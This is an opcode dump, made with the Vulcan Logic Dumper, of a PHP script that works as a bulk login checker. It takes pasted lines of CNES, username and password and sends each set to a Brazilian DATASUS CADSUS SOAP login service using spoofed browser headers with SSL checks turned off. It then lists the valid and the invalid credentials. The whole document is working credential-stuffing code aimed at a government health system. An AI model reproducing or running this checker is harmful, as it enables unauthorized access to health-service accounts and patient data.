Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 6, Position 2 = 73
Branch analysis from position: 6
1 jumps found. (Code = 42) Position 1 = 67
Branch analysis from position: 67
2 jumps found. (Code = 44) Position 1 = 69, Position 2 = 25
Branch analysis from position: 69
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 25
2 jumps found. (Code = 44) Position 1 = 69, Position 2 = 25
Branch analysis from position: 69
Branch analysis from position: 25
Branch analysis from position: 73
filename: /in/gtblu
function name: (null)
number of ops: 74
compiled vars: !0 = $SetParamList, !1 = $SetParamCount, !2 = $setParamUX, !3 = $CNES, !4 = $USER, !5 = $SENHA, !6 = $RESTO, !7 = $setParamFunction
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
4 0 E > INIT_FCALL 'set_time_limit'
1 SEND_VAL 0
2 DO_ICALL
23 3 FETCH_IS ~9 '_POST'
4 ISSET_ISEMPTY_DIM_OBJ 0 ~9, 'enviar'
5 > JMPZ ~10, ->73
24 6 > INIT_FCALL 'trim'
7 FETCH_R global ~11 '_POST'
8 FETCH_DIM_R ~12 ~11, 'cartoes'
9 SEND_VAL ~12
10 DO_ICALL $13
11 ASSIGN !0, $13
25 12 INIT_FCALL 'xflush'
13 DO_FCALL 0
26 14 INIT_FCALL 'explode'
15 SEND_VAL '%0A'
16 SEND_VAR !0
17 DO_ICALL $16
18 ASSIGN !0, $16
27 19 COUNT ~18 !0
20 ASSIGN !1, ~18
28 21 INIT_FCALL 'xflush'
22 DO_FCALL 0
29 23 ASSIGN !2, 0
24 > JMP ->67
30 25 > INIT_FCALL 'str_replace'
26 SEND_VAL '+'
27 SEND_VAL ''
28 SEND_VAR !0
29 DO_ICALL $22
30 ASSIGN !0, $22
31 31 INIT_FCALL 'str_replace'
32 SEND_VAL '%0D'
33 SEND_VAL ''
34 SEND_VAR !0
35 DO_ICALL $24
36 ASSIGN !0, $24
32 37 INIT_FCALL 'str_replace'
38 SEND_VAL '%0A'
39 SEND_VAL ''
40 SEND_VAR !0
41 DO_ICALL $26
42 ASSIGN !0, $26
34 43 INIT_FCALL 'explode'
44 SEND_VAL '%7C'
45 FETCH_DIM_R ~28 !0, !2
46 SEND_VAL ~28
47 DO_ICALL $29
48 FETCH_LIST_R $30 $29, 0
49 ASSIGN !3, $30
50 FETCH_LIST_R $32 $29, 1
51 ASSIGN !4, $32
52 FETCH_LIST_R $34 $29, 2
53 ASSIGN !5, $34
54 FETCH_LIST_R $36 $29, 3
55 ASSIGN !6, $36
56 FREE $29
36 57 INIT_FCALL 'xflush'
58 DO_FCALL 0
37 59 INIT_FCALL_BY_NAME 'CardCheck'
60 SEND_VAR_EX !3
61 SEND_VAR_EX !4
62 SEND_VAR_EX !5
63 DO_FCALL 0 $39
64 ASSIGN !7, $39
38 65 ECHO !7
29 66 PRE_INC !2
67 > IS_SMALLER !2, !1
68 > JMPNZ ~42, ->25
40 69 > ROPE_INIT 3 ~44 '%3Cbr%3E+%3Ccenter%3E%3Cdiv+style%3D%27width%3A+20%25%3B%27+class%3D%27alert+alert-success%27%3EForam+testados+%3Cstrong%3E'
70 ROPE_ADD 1 ~44 ~44, !1
71 ROPE_END 2 ~43 ~44, '%3C%2Fstrong%3E+logins%3C%2Fdiv%3E%3C%2Fcenter%3E'
72 ECHO ~43
130 73 > > RETURN 1
Function xflush:
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 3, Position 2 = 9
Branch analysis from position: 3
2 jumps found. (Code = 43) Position 1 = 11, Position 2 = 12
Branch analysis from position: 11
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 12
2 jumps found. (Code = 46) Position 1 = 18, Position 2 = 22
Branch analysis from position: 18
2 jumps found. (Code = 46) Position 1 = 23, Position 2 = 27
Branch analysis from position: 23
2 jumps found. (Code = 43) Position 1 = 28, Position 2 = 33
Branch analysis from position: 28
1 jumps found. (Code = 42) Position 1 = 60
Branch analysis from position: 60
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 33
2 jumps found. (Code = 46) Position 1 = 37, Position 2 = 41
Branch analysis from position: 37
2 jumps found. (Code = 46) Position 1 = 42, Position 2 = 46
Branch analysis from position: 42
2 jumps found. (Code = 46) Position 1 = 47, Position 2 = 51
Branch analysis from position: 47
2 jumps found. (Code = 43) Position 1 = 52, Position 2 = 60
Branch analysis from position: 52
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 60
Branch analysis from position: 51
Branch analysis from position: 46
Branch analysis from position: 41
Branch analysis from position: 27
Branch analysis from position: 22
Branch analysis from position: 9
filename: /in/gtblu
function name: xflush
number of ops: 61
compiled vars: !0 = $output_handler
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
6 0 E > BIND_STATIC !0
7 1 TYPE_CHECK 2 !0
2 > JMPZ ~1, ->9
8 3 > BEGIN_SILENCE ~2
4 INIT_FCALL 'ini_get'
5 SEND_VAL 'output_handler'
6 DO_ICALL $3
7 END_SILENCE ~2
8 ASSIGN !0, $3
11 9 > IS_EQUAL !0, 'ob_gzhandler'
10 > JMPZ ~5, ->12
12 11 > > RETURN null
15 12 > INIT_FCALL 'flush'
13 DO_ICALL
16 14 INIT_FCALL 'function_exists'
15 SEND_VAL 'ob_flush'
16 DO_ICALL $7
17 > JMPZ_EX ~8 $7, ->22
18 > INIT_FCALL 'function_exists'
19 SEND_VAL 'ob_get_length'
20 DO_ICALL $9
21 BOOL ~8 $9
22 > > JMPZ_EX ~8 ~8, ->27
23 > INIT_FCALL 'ob_get_length'
24 DO_ICALL $10
25 TYPE_CHECK 1018 ~11 $10
26 BOOL ~8 ~11
27 > > JMPZ ~8, ->33
17 28 > BEGIN_SILENCE ~12
29 INIT_FCALL 'ob_flush'
30 DO_ICALL
31 END_SILENCE ~12
32 > JMP ->60
18 33 > INIT_FCALL 'function_exists'
34 SEND_VAL 'ob_end_flush'
35 DO_ICALL $14
36 > JMPZ_EX ~15 $14, ->41
37 > INIT_FCALL 'function_exists'
38 SEND_VAL 'ob_start'
39 DO_ICALL $16
40 BOOL ~15 $16
41 > > JMPZ_EX ~15 ~15, ->46
42 > INIT_FCALL 'function_exists'
43 SEND_VAL 'ob_get_length'
44 DO_ICALL $17
45 BOOL ~15 $17
46 > > JMPZ_EX ~15 ~15, ->51
47 > INIT_FCALL 'ob_get_length'
48 DO_ICALL $18
49 TYPE_CHECK 1018 ~19 $18
50 BOOL ~15 ~19
51 > > JMPZ ~15, ->60
19 52 > BEGIN_SILENCE ~20
53 INIT_FCALL 'ob_end_flush'
54 DO_ICALL
55 END_SILENCE ~20
20 56 BEGIN_SILENCE ~22
57 INIT_FCALL 'ob_start'
58 DO_ICALL
59 END_SILENCE ~22
22 60 > > RETURN null
End of function xflush
Function cardcheck:
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 125, Position 2 = 133
Branch analysis from position: 125
2 jumps found. (Code = 43) Position 1 = 138, Position 2 = 139
Branch analysis from position: 138
2 jumps found. (Code = 43) Position 1 = 144, Position 2 = 152
Branch analysis from position: 144
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 152
Branch analysis from position: 139
Branch analysis from position: 133
filename: /in/gtblu
function name: CardCheck
number of ops: 153
compiled vars: !0 = $CNES, !1 = $USER, !2 = $SENHA, !3 = $request, !4 = $header, !5 = $soap_do, !6 = $response, !7 = $xml, !8 = $body, !9 = $array, !10 = $obj
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
43 0 E > RECV !0
1 RECV !1
2 RECV !2
55 3 CONCAT ~11 '%3CSOAP-ENV%3AEnvelope+xmlns%3ASOAP-ENV%3D%22http%3A%2F%2Fschemas.xmlsoap.org%2Fsoap%2Fenvelope%2F%22+xmlns%3Axsd%3D%22http%3A%2F%2Fwww.w3.org%2F2001%2FXMLSchema%22+xmlns%3Axsi%3D%22http%3A%2F%2Fwww.w3.org%2F2001%2FXMLSchema-instance%22%3E%3CSOAP-ENV%3ABody%3E%3Ctns%3AvalidaLogin+xmlns%3Atns%3D%22http%3A%2F%2FservidorWsCadsusCobdn.cobdn.datasus.gov.br%2F%22%3E%3CusuarioSistema%3ECADSUS%3C%2FusuarioSistema%3E%3CsenhaSistema%3E%3C%2FsenhaSistema%3E%3CcodigoSistema%3E003%3C%2FcodigoSistema%3E%3CbancoSistema%3EFEDCADWEB-DATASUS-00000010%3C%2FbancoSistema%3E%3CibgeSistema%3E330455%3C%2FibgeSistema%3E%3Cusername%3E', !0
4 CONCAT ~12 ~11, '%3C%2Fusername%3E'
56 5 CONCAT ~13 ~12, '%3CsenhaUsername%3E'
6 CONCAT ~14 ~13, !2
7 CONCAT ~15 ~14, '%3C%2FsenhaUsername%3E'
57 8 CONCAT ~16 ~15, '%3CcnsOperador%3E'
9 CONCAT ~17 ~16, !1
10 CONCAT ~18 ~17, '%3C%2FcnsOperador%3E'
58 11 CONCAT ~19 ~18, '%3CsenhaOperador%3E'
12 CONCAT ~20 ~19, !2
13 CONCAT ~21 ~20, '%3C%2FsenhaOperador%3E'
59 14 CONCAT ~22 ~21, '%3C%2Ftns%3AvalidaLogin%3E'
60 15 CONCAT ~23 ~22, '%3C%2FSOAP-ENV%3ABody%3E'
61 16 CONCAT ~24 ~23, '%3C%2FSOAP-ENV%3AEnvelope%3E'
47 17 ASSIGN !3, ~24
63 18 INIT_ARRAY ~26 'Host%3A+189.28.143.114%3A8080'
64 19 ADD_ARRAY_ELEMENT ~26 'Connection%3A+keep-alive'
65 20 STRLEN ~27 !3
21 CONCAT ~28 'Content-length%3A+', ~27
22 ADD_ARRAY_ELEMENT ~26 ~28
66 23 ADD_ARRAY_ELEMENT ~26 'Origin%3A+http%3A%2F%2Fcartaonet.datasus.gov.br'
67 24 ADD_ARRAY_ELEMENT ~26 'X-Requested-With%3A+ShockwaveFlash%2F23.0.0.166'
68 25 ADD_ARRAY_ELEMENT ~26 'User-Agent%3A+Mozilla%2F5.0+%28Windows+NT+6.1%2C+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F53.0.2785.116+Safari%2F537.36'
69 26 ADD_ARRAY_ELEMENT ~26 'Content-Type%3A+text%2Fxml%2C+charset%3Dutf-8'
70 27 ADD_ARRAY_ELEMENT ~26 'Accept%3A+%2A%2F%2A'
71 28 ADD_ARRAY_ELEMENT ~26 'Referer%3A+http%3A%2F%2Fcartaonet.datasus.gov.br%2Foperadores%2FCadWeb.swf'
72 29 ADD_ARRAY_ELEMENT ~26 'Accept-Encoding%3A+gzip%2C+deflate'
73 30 ADD_ARRAY_ELEMENT ~26 'Accept-Language%3A+pt-BR%2Cpt%2Cq%3D0.8%2Cen-US%2Cq%3D0.6%2Cen%2Cq%3D0.4'
62 31 ASSIGN !4, ~26
86 32 INIT_FCALL_BY_NAME 'curl_init'
33 DO_FCALL 0 $30
34 ASSIGN !5, $30
87 35 INIT_FCALL_BY_NAME 'curl_setopt'
36 SEND_VAR_EX !5
37 FETCH_CONSTANT ~32 'CURLOPT_URL'
38 SEND_VAL_EX ~32
39 SEND_VAL_EX 'http%3A%2F%2F189.28.143.114%3A8080%2FServidorWsCadsusJdbc%2FServidorWsCadsusCobdn'
40 DO_FCALL 0
88 41 INIT_FCALL_BY_NAME 'curl_setopt'
42 SEND_VAR_EX !5
43 FETCH_CONSTANT ~34 'CURLOPT_RETURNTRANSFER'
44 SEND_VAL_EX ~34
45 SEND_VAL_EX <true>
46 DO_FCALL 0
89 47 INIT_FCALL_BY_NAME 'curl_setopt'
48 SEND_VAR_EX !5
49 FETCH_CONSTANT ~36 'CURLOPT_SSL_VERIFYPEER'
50 SEND_VAL_EX ~36
51 SEND_VAL_EX <false>
52 DO_FCALL 0
90 53 INIT_FCALL_BY_NAME 'curl_setopt'
54 SEND_VAR_EX !5
55 FETCH_CONSTANT ~38 'CURLOPT_SSL_VERIFYHOST'
56 SEND_VAL_EX ~38
57 SEND_VAL_EX <false>
58 DO_FCALL 0
91 59 INIT_FCALL_BY_NAME 'curl_setopt'
60 SEND_VAR_EX !5
61 FETCH_CONSTANT ~40 'CURLOPT_HEADER'
62 SEND_VAL_EX ~40
63 SEND_VAL_EX 0
64 DO_FCALL 0
92 65 INIT_FCALL_BY_NAME 'curl_setopt'
66 SEND_VAR_EX !5
67 FETCH_CONSTANT ~42 'CURLOPT_POST'
68 SEND_VAL_EX ~42
69 SEND_VAL_EX <true>
70 DO_FCALL 0
93 71 INIT_FCALL_BY_NAME 'curl_setopt'
72 SEND_VAR_EX !5
73 FETCH_CONSTANT ~44 'CURLOPT_POSTFIELDS'
74 SEND_VAL_EX ~44
75 SEND_VAR_EX !3
76 DO_FCALL 0
94 77 INIT_FCALL_BY_NAME 'curl_setopt'
78 SEND_VAR_EX !5
79 FETCH_CONSTANT ~46 'CURLOPT_HTTPHEADER'
80 SEND_VAL_EX ~46
81 SEND_VAR_EX !4
82 DO_FCALL 0
95 83 INIT_FCALL_BY_NAME 'curl_exec'
84 SEND_VAR_EX !5
85 DO_FCALL 0 $48
86 ASSIGN !6, $48
96 87 INIT_FCALL 'preg_replace'
88 SEND_VAL '%2F%28%3C%5C%2F%3F%29%28%5Cw%2B%29%3A%28%5B%5E%3E%5D%2A%3E%29%2F'
89 SEND_VAL '%241%242%243'
90 SEND_VAR !6
91 DO_ICALL $50
92 ASSIGN !6, $50
99 93 NEW $52 'SimpleXMLElement'
94 SEND_VAR_EX !6
95 DO_FCALL 0
96 ASSIGN !7, $52
108 97 INIT_METHOD_CALL !7, 'xpath'
98 SEND_VAL_EX '%2F%2FSBody'
99 DO_FCALL 0 $55
100 FETCH_DIM_R ~56 $55, 0
101 ASSIGN !8, ~56
109 102 INIT_FCALL 'json_decode'
103 INIT_FCALL 'json_encode'
104 CAST 7 ~58 !8
105 SEND_VAL ~58
106 DO_ICALL $59
107 SEND_VAR $59
108 SEND_VAL <true>
109 DO_ICALL $60
110 ASSIGN !9, $60
110 111 INIT_FCALL 'json_encode'
112 SEND_VAR !9
113 DO_ICALL $62
114 ASSIGN !9, $62
111 115 INIT_FCALL 'json_decode'
116 SEND_VAR !9
117 SEND_VAL <true>
118 DO_ICALL $64
119 ASSIGN !10, $64
119 120 FETCH_DIM_R ~66 !10, 'ns2validaLoginResponse'
121 FETCH_DIM_R ~67 ~66, 'return'
122 FETCH_DIM_R ~68 ~67, 'descricaoErro'
123 IS_EQUAL ~68, 'Cnes+%2F+Username+%2F+Senha+inv%C3%A1lido%21'
124 > JMPZ ~69, ->133
125 > ROPE_INIT 7 ~71 '%3Cscript%3Edocument.getElementById%28%27reprovadas%27%29.innerHTML+%2B%3D+%27'
126 ROPE_ADD 1 ~71 ~71, !0
127 ROPE_ADD 2 ~71 ~71, '%7C'
128 ROPE_ADD 3 ~71 ~71, !1
129 ROPE_ADD 4 ~71 ~71, '%7C'
130 ROPE_ADD 5 ~71 ~71, !2
131 ROPE_END 6 ~70 ~71, '%27+%2B+%27%3Cbr%3E%27%3B%3C%2Fscript%3E'
132 ECHO ~70
123 133 > FETCH_DIM_R ~75 !10, 'ns2validaLoginResponse'
134 FETCH_DIM_R ~76 ~75, 'return'
135 FETCH_DIM_R ~77 ~76, 'descricaoErro'
136 IS_EQUAL ~77, 'Este+usu%C3%A1rio+foi+desabilitado%21'
137 > JMPZ ~78, ->139
138 > ECHO ''
126 139 > FETCH_DIM_R ~79 !10, 'ns2validaLoginResponse'
140 FETCH_DIM_R ~80 ~79, 'return'
141 FETCH_DIM_R ~81 ~80, 'descricaoErro'
142 IS_EQUAL ~81, 'Login+validado%21'
143 > JMPZ ~82, ->152
144 > ROPE_INIT 7 ~84 '%3Cscript%3Edocument.getElementById%28%27aprovadas%27%29.innerHTML+%2B%3D+%27'
145 ROPE_ADD 1 ~84 ~84, !0
146 ROPE_ADD 2 ~84 ~84, '%7C'
147 ROPE_ADD 3 ~84 ~84, !1
148 ROPE_ADD 4 ~84 ~84, '%7C'
149 ROPE_ADD 5 ~84 ~84, !2
150 ROPE_END 6 ~83 ~84, '%27+%2B+%27%3Cbr%3E%27%3B%3C%2Fscript%3E'
151 ECHO ~83
129 152 > > RETURN null
End of function cardcheck
Generated using Vulcan Logic Dumper, using php 8.0.0